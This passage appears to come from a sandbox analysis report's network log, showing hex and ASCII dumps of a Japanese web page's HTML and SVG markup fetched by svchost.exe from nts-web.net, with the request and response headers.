                                                                                                                                                                                                                                                        Data Ascii: ,.18,3.33"></path><path class="cls-9" d="M512.22,194.87a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1A2.8,2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6052INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 41 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2c 35 34 33 2c 32 37 36 61 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: ,1-.91,2.6A2.94,2.94,0,0,1,543,276a2.82,2.82,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6068INData Raw: 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 30 37 2c 33 34 36 2e 31 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M583.07,346.12a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6084INData Raw: 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                        Data Ascii: 8,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6100INData Raw: 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 2,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6116INData Raw: 2d 39 22 20 64 3d 22 4d 33 39 30 2e 32 34 2c 31 35 39 2e 31 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32
                                                                                                                                                                                                                                                        Data Ascii: -9" d="M390.24,159.13a1.62,1.62,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.89,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6660INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 38 33 2c 33 35 2e 33 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 34 30 32 2c 33 36 2e 35 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e
                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M405.83,35.3a1.62,1.62,0,0,1-.73,2.09A2.36,2.36,0,0,1,402,36.5a2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6676INData Raw: 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 34 2e 31 35 2c 39 32 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M434.15,92.74a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.7
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6692INData Raw: 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 34 37 2c 31 35 30 2e 31 39 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M462.47,150.19a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6708INData Raw: 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6724INData Raw: 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6740INData Raw: 34 2e 39 31 2c 31 34 37 2e 37 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: 4.91,147.74a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6756INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 35 2c 32 33 2e 39 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38
                                                                                                                                                                                                                                                        Data Ascii: ="cls-9" d="M550.5,23.91a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC6772INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 2d 77 72 61 70 20 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 73 75 62 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 22 3e e5 ae 9f e7 b8 be e7 b4 b9 e4 bb 8b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65
                                                                                                                                                                                                                                                        Data Ascii: > </div> </div> </div> <div class="section-top-performance"> <div class="subsection-title-wrap top-performance-title"> <h2 class="subsection-title"></h2> </div> <div class="top-pe


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        21192.168.2.35947049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2866OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3147INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:09 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 2599435
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Thu, 21 Sep 2023 05:40:29 GMT
                                                                                                                                                                                                                                                        ETag: "27aa0b-605d7ee086c61"
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3147INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3163INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                        Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3259INData Raw: 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f
                                                                                                                                                                                                                                                        Data Ascii: 2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/
